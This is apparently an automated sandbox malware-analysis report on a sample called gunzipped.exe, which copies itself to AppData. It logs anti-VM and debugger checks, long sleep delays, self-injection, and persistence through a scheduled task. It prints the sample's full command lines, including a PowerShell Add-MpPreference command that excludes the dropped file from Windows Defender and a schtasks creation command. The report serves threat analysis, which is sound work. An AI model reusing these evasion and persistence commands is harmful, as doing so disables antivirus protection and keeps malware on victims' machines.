                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: gunzipped.exe PID: 6640, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: mPvIOxEZXJsdYp.exe PID: 7368, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\gunzipped.exeMemory allocated: F80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeMemory allocated: 2D40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeMemory allocated: 2B80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeMemory allocated: 7B70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeMemory allocated: 8B70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeMemory allocated: 8D20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeMemory allocated: 9D20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeMemory allocated: A2D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeMemory allocated: B2D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeMemory allocated: 2B70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeMemory allocated: 2DA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeMemory allocated: 2BB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeMemory allocated: 7AC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeMemory allocated: 7070000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeMemory allocated: 8AC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeMemory allocated: 9AC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeMemory allocated: 9ED0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeMemory allocated: AED0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeMemory allocated: BED0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7546Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2211Jump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exe TID: 5324Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7356Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exe TID: 7332Thread sleep time: -120000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe TID: 7388Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\gunzipped.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeThread delayed: delay time: 60000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: mPvIOxEZXJsdYp.exe, 0000000D.00000002.1741727533.00000000011F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
                      Source: gunzipped.exe, 00000007.00000002.1966713417.0000000000C28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 13_2_0040317B mov eax, dword ptr fs:[00000030h]13_2_0040317B
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 13_2_00402B7C GetProcessHeap,HeapAlloc,13_2_00402B7C
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"Jump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\gunzipped.exeMemory written: C:\Users\user\Desktop\gunzipped.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeMemory written: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp5B1F.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess created: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess created: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Users\user\Desktop\gunzipped.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
